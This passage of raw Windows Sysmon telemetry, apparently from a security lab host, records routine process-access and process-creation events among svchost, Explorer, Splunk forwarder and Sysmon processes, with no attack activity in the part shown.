16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028580Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028579Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028578Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028577Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028576Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028575Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028574Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028573Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028572Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028571Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028570Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028569Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028568Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028567Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028566Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028565Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028564Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028563Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028562Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028561Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028560Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.505{7901BC46-538A-6008-8906-00000000A301}73523680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028559Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.349{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-538A-6008-8906-00000000A301}7352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028558Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.349{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028557Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.349{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028556Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.349{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028555Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.349{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028554Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.349{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-538A-6008-8906-00000000A301}7352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028553Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.349{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-538A-6008-8906-00000000A301}7352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028552Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.351{7901BC46-538A-6008-8906-00000000A301}7352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028604Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.943{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-538B-6008-8B06-00000000A301}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028603Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:11.943{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 